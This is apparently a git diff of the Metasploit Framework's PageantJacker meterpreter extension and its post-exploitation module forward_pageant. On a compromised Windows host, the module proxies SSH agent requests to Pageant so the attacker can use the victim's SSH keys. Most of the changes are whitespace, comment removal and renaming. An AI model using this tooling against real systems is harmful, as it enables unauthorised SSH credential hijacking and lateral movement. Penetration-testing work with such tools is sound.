diff --git a/lib/rex/post/meterpreter/extensions/pageantjacker/pageantjacker.rb b/lib/rex/post/meterpreter/extensions/pageantjacker/pageantjacker.rb index 48cd6f5d48..d98abc8fd8 100644 --- a/lib/rex/post/meterpreter/extensions/pageantjacker/pageantjacker.rb +++ b/lib/rex/post/meterpreter/extensions/pageantjacker/pageantjacker.rb @@ -33,15 +33,12 @@ class Pageantjacker < Extension def forward_to_pageant(blob,size) return unless size > 0 return unless blob.size > 0 - #puts "Request indicated size: #{size}" - #parse_blob(blob) - # Create the packet packet_request = Packet.create_request('pageant_send_query') packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANTJACKER_SIZE_IN, size) packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANTJACKER_BLOB_IN, blob) - - response = client.send_request(packet_request) + + response = client.send_request(packet_request) return nil if !response pageant_plugin_response = { @@ -53,18 +50,6 @@ class Pageantjacker < Extension return pageant_plugin_response end -# def parse_blob(blob) -# b = blob.unpack('NCH*') -# puts " blob size #{blob.size}" -# puts " blob data (20 chars: #{blob.unpack('H20').first}" -# puts " ssh packet size: #{b[0]}" -# puts " ssh type: #{b[1]}" -# puts " ssh data: #{b[2]}" -# end - -# def stop_listening -# end - end end; end; end; end; end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/pageantjacker.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/pageantjacker.rb index 4a0c7d57c1..598fea8154 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/pageantjacker.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/pageantjacker.rb @@ -6,11 +6,9 @@ module Post module Meterpreter module Ui -require 'tmpdir' - ### # -# PageantJacker extension +# PageantJacker extension # ### class Console::CommandDispatcher::PageantJacker @@ -23,17 +21,18 @@ class Console::CommandDispatcher::PageantJacker super print_line print_line - print_line(" .mMMMMMm. mMMm M WWW W W RRRRR") - print_line(" mMMMMMMMMMMM. MM MM W W W R R") - print_line(" /MMMM- -MM. MM MM W W W R R") - print_line(" /MMM. _ \/ ^ M M M M W W W W RRRR") - print_line(" |M. aRRr /W| M M M M W W W W R R") - print_line(" \/ .. ^^^ wWWW| M M M W W R R") - print_line(" /WW\. .wWWWW/ M M M W W R R") - print_line(" |WWWWWWWWWWW/") - print_line(" .WWWWWW. PageantJacker Extension") + print_line(" .mMMMMMm. mMMm M WWW W W RRRRR") + print_line(" mMMMMMMMMMMM. MM MM W W W R R") + print_line(" /MMMM- -MM. MM MM W W W R R") + print_line(" /MMM. _ \/ ^ M M M M W W W W RRRR") + print_line(" |M. aRRr /W| M M M M W W W W R R") + print_line(" \/ .. ^^^ wWWW| M M M W W R R") + print_line(" /WW\. .wWWWW/ M M M W W R R") + print_line(" |WWWWWWWWWWW/") + print_line(" .WWWWWW. PageantJacker Extension") + print_line(" stuart.morgan@mwrinfosecurity.com") print_line - print_line(" Use post/windows/manage/forward_pageant to proxy agent requests through Pageant") + print_line(" Use post/windows/manage/forward_pageant to proxy through Pageant") print_line end diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb index 7084731525..5474fa112f 100644 --- a/modules/post/windows/manage/forward_pageant.rb +++ b/modules/post/windows/manage/forward_pageant.rb @@ -13,7 +13,7 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Forward SSH agent requests to Pageant', + 'Name' => 'Forward SSH Agent Requests To Remote Pageant', 'Description' => %q{ This module forwards SSH agent requests from a local socket to a remote Pageant instance. If a target Windows machine is compromised and is running Pageant, this will allow the @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Post loaded into the remote meterpreter session by this module if it is not already loaded. }, 'License' => MSF_LICENSE, - 'Author' => [ + 'Author' => [ 'Stuart Morgan ', ], 'Platform' => [ 'win' ], @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Post if ::File.exists?(@sockpath) print_error("Your requested socket (#{@sockpath}) already exists. Remove it or choose another path and try again.") return false - end + end # Open the socket and start listening on it. Essentially now forward traffic between us and the remote Pageant instance. ::UNIXServer.open(@sockpath) {|serv| @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Post print_status("Set SSH_AUTH_SOCK variable to #{@sockpath} (e.g. export SSH_AUTH_SOCK=\"#{@sockpath}\")") print_status("Now use any tool normally (e.g. ssh-add)") - loop { + loop { s = serv.accept loop { socket_request_data = s.recvfrom(8192) @@ -79,14 +79,14 @@ class Metasploit3 < Msf::Post vprint_status("PageantJacker: Received data from socket (size: #{socket_request_data.first.size})") response = client.pageantjacker.forward_to_pageant(socket_request_data.first, socket_request_data.first.size) if response[:success] - s.send response[:blob],0 + s.send response[:blob],0 vprint_status("PageantJacker: Response received (Success='#{response[:success]}' Size='#{response[:blob].size}' Error='#{response[:error]}')") else print_error("PageantJacker: Unsuccessful response received (#{response[:error]})") end - } - } - } + } + } + } end